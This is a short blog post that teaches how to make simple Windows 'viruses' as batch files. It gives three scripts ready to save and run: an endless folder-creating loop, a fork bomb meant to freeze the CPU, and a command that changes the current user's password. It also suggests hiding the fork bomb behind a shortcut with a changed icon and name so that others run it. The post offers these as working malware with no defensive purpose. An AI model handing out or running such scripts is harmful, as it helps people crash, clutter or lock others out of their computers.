Welcome To My World

Welcome To My World

How to Create a Virus with Notepad

How to Create your Own Virus using Batch Scripting

1.  Make an Infinity of Folders :

  1) Open Notepad
  2) Paste the following code:
@echo off
:ztuts
md %random%
goto ztuts

 3) Now click File > Save as...  and save it as "folders.bat" 


2. Freezes the CPU 


  1) Open up Notepad
  2) Paste the following code:

%0|%0

  3) Save it as : "CPU.bat"
  4) You can also customize this Bat file by creating a shortcut of it, changing its icon then rename it.


3. Change Computer Password


  1) Launch Notepad
  2) Paste the following code:
  
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::


Note: Change "Razor" to anything you want, that will be the pass.

  3) Save it as "anything.bat"
  4) Done!
Share this post
  • Share to Facebook
  • Share to Twitter
  • Share to Google+
  • Share to Stumble Upon
  • Share to Evernote
  • Share to Blogger
  • Share to Email
  • Share to Yahoo Messenger
  • More...

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

 
© 2011 Welcome To My World | 2012 Templates
Designed by BlogThietKe Cooperated with Duy Pham
Released under Creative Commons 3.0 CC BY-NC 3.0
Posts RSSComments RSS
Back to top